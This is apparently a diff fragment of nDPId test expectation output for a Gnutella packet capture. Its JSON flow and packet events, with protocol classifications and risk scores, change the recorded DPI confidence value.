00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4138,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":2,"flow_last_seen":281023,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":281023,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LQAAAER3GUKAAIP7\/\/\/+uDQB2wAtgxeTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4148,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":3,"flow_last_seen":282039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":282039,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LUAAAER3GQKAAIP7\/\/\/+uDQB2wAtgxeTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00792{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":101162,"flow_last_seen":177309,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":101837,"flow_last_seen":251767,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00792{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":101162,"flow_last_seen":177309,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":101837,"flow_last_seen":251767,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":93714,"flow_last_seen":253026,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95893,"flow_last_seen":251793,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1751,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 